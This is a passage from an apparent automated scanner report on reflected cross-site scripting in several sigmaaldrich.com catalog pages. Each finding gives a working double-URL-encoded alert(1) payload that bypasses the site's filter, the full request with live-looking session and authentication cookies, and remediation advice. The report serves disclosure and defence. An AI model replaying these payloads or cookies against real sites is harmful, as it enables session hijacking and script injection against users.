Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/5adfd";alert(1)//6b84be9a72b","E404") ;
   </script>
...[SNIP]...

1.4. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9 was submitted in the REST URL parameter 1. This input was echoed as 111e8";alert(1)//badc87d23d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9/analytical-chromatography-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography111e8";alert(1)//badc87d23d9/analytical-chromatography-catalog.html","E404") ;
   </script>
...[SNIP]...

1.5. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74355%2522%253balert%25281%2529%252f%252f989934dd0d8 was submitted in the REST URL parameter 2. This input was echoed as 74355";alert(1)//989934dd0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/74355%2522%253balert%25281%2529%252f%252f989934dd0d8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:55 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/74355";alert(1)//989934dd0d8","E404") ;
   </script>
...[SNIP]...

1.6. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a9a%2522%253balert%25281%2529%252f%252fad9658751f was submitted in the REST URL parameter 1. This input was echoed as 25a9a";alert(1)//ad9658751f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography25a9a%2522%253balert%25281%2529%252f%252fad9658751f/analytical-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography25a9a";alert(1)//ad9658751f/analytical-reagents.html","E404") ;
   </script>
...[SNIP]...

1.7. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a213b%2522%253balert%25281%2529%252f%252fd062356e941 was submitted in the REST URL parameter 2. This input was echoed as a213b";alert(1)//d062356e941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a213b%2522%253balert%25281%2529%252f%252fd062356e941 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a213b";alert(1)//d062356e941","E404") ;
   </script>
...[SNIP]...

1.8. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53 was submitted in the REST URL parameter 1. This input was echoed as 5b7f8";alert(1)//9bb4c219a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53/analytical-standards.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 